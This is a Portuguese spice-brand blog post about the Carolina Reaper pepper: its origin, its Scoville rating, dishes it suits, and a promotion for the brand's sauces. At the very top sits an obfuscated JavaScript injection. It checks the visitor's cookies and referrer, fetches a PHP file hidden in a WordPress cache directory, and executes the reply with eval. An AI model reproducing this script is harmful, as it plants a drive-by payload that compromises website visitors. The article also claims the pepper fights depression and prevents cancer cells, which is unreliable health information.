;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//blog.bombayhs.com.br/wp-content/cache/asset-cleanup/css/item/inline/inline.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}

Carolina Reaper: é a pimenta mais ardida do mundo, você sabia disso?

Pois é! Hoje você descobrirá tudo sobre essa pimenta que nunca passa despercebida.

Pimenta Carolina Reaper

Considerada, pelo Guiness Book, desde 2013, a pimenta mais ardida do mundo.

Um assunto e tanto – porque é sempre uma dupla delícia falar sobre as pimentas mais ardidas do mundo – agora você saberá muito mais sobre essa pimenta nuclear!

Carolina Reaper: conheça a pimenta mais ardida do mundo

Origem da pimenta

Originada da Carolina do Sul, Estados Unidos, e tem um responsável: o cultivador Ed Currie, diretor da Pucker Butt Pepper Co.

Da espécie Capsicum chinense, ela é resultado do cruzamento entre Habanero e Naga Bhut Jolokia e seu nome original era HP22BNH.

A pimenta mais forte do mundo tem variedades e sub-tipos: a vermelha é a mais comum, mas há também a amarela, chamada de pêssego; e a carolina reaper chocolate.

Nas lojas especializadas é mais fácil de encontrar o molho de pimenta, mas ela pode ser encontrada também na forma desidratada.

Daí basta consumir poucos flocos para provar sua deliciosa – e potente – ardência. O seu fruto tem superfície áspera, normalmente vermelho brilhante, e tem uma longa cauda de ferrão.

Pimenta mais ardida do mundo

A ardência dessa pimenta foi comprovada depois de análises realizadas pela Universidade Winthrop na Carolina do Norte, Estados Unidos.

Ela atingiu 1.569.300 pontos na escala Scoville, que é a medida usada para especificar o nível de ardência das pimentas.

No início ela é bastante saborosa, de gosto doce e cítrico, para quem tem coragem de prová-la.

O calor intenso acomete 20 minutos depois, e é crescente, chegando à sensação de morte. Por isso também é conhecida como pimenta ceifeira.

No grau de ardência da Bombay, ela atinge o nível máximo de 44 na escala!

Com o que ela combina?

Pode ser usada em carnes na brasa, em rabada, feijoada, macarronada, além de bebidas como cervejas artesanais e drinks.

Até em doces ela pode ser usada, principalmente nos chocolates.

A carolina reaper pode ser usada também como um excelente tempero picante para as receitas com carnes, podendo ser adicionado tanto durante, quanto depois da preparação.

Receita Carne Louca:

Cuidados ao consumir a pimenta Carolina Reaper

Como o grau de ardência é altíssimo, quem consumi-la deve estar atento a isso e, de preferência, já estar acostumado com pimentas fortes.

Quem não tem costume de apimentar os pratos pode prová-la, evidentemente, mas com muita moderação e responsabilidade – principalmente se houver crianças e demais pessoas sensíveis à mesa.

O alto consumo pode causar dor na boca, na garganta e no estômago. Apenas uma dose muitíssimo elevada pode levar a morte – em torno de 1.3 quilos de uma única vez –, mas isso não quer dizer que não faça muito mal se passar da conta.

Benefícios da pimenta

Em pouca quantidade, consumir a pimenta mais ardida do mundo faz bem à saúde.

As pimentas carolina reaper melhoram o humor, combatem a depressão, são antioxidantes, termogênica, previne o envelhecimento precoce, evita células cancerígenas e ainda são afrodisíacas.

História da pimenta

Ed Currie, quem criou a ceifadora carolina reaper, é um aficionado por pimentas, por seu sabor e por causar “sofrimento”.

Outra razão para tê-la criado é o histórico de câncer e doenças cardíacas na família, o que o motivou a estudar a relação entre essas doenças e o estilo de vida das pessoas.

Foi quando descobriu que quem consome comidas apimentadas tem menos chances de ter doenças cardíacas e cânceres.

Onde comprar e preço?

Se você também é um aficionado por pimentas, precisa experimentar a pimenta mais ardida do mundo.

Viva essa experiência de intenso calor.

A Bombay tem o molho certo se você quer experimentar da pimenta carolina: o molho carolina reaper, clique na foto abaixo e conheça mais:

pimenta carolina reaper bombay

Comprar pimenta carolina reaper Bombay

 

 

 

 

 

 

 

 

Se você realmente é viciado em pimentas nucleares (ou nas pimentas mais fortes do mundo), conheça o Kit de Pimentas mais Fortes do Mundo Bombay.

Um Kit exclusivo com os molhos das 3 pimentas nucleares: Pimenta Carolina Reaper, Pimenta Trinidad Scorpion e Pimenta Bhut Jolokia.

E não deixe de olhar o site da Bombay, você pode encontrar os melhores temperos para deixar suas receitas ainda melhores!

Para mais receitas e dicas, acompanhe o Blog Bombay e esteja sempre por dentro das maiores novidades do mundo das ervas, especiarias e pimentas da gastronomia mundial.

Deixe uma Resposta